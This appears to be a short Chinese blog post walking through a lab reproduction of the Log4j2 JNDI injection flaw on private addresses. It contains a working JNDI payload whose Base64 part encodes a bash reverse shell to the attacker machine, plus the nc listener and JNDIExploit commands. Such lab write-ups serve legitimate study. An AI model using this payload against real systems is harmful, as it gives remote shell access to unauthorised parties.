之前bugku有一题是log4j2的复现,然后看到网上一个本地复现的帖子,那就拿这个帖子来做一个简单验证
原文地址:https://bbs.wxctf.com/thread-622-1-1.html
只有两台机器:
受害机ip:192.168.200.132:38080
攻击机:192.168.200.128(burpsuite,jndiexploit,nc)
环境docker拉一下,访问192.168.200.132:38080看见error页面就说明起起来了
说一下可能出错的地方,不要图省事,将docker也拉到kali上,因为docker做了一个端口映射,其实他也用的8080端口
burp,jndiexploit,docker三个都映射到8080端口,不打架才怪
我把docker放在受害机上了
然后把burp的监听端口改成80了,这样就只有jndiexploit一个在用8080,那就不会出错了,ok!
那么就好了
payload=${jndi:ldap://192.168.200.128:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMjgvNjY2NiAwPiYx}
nc -lvvp 6666
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.200.128
拿到shell,复现完毕
参考视频链接:https://www.bilibili.com/video/BV14Y411W7Dh/
log4j2复现试验
最新推荐文章于 2024-04-29 21:21:45 发布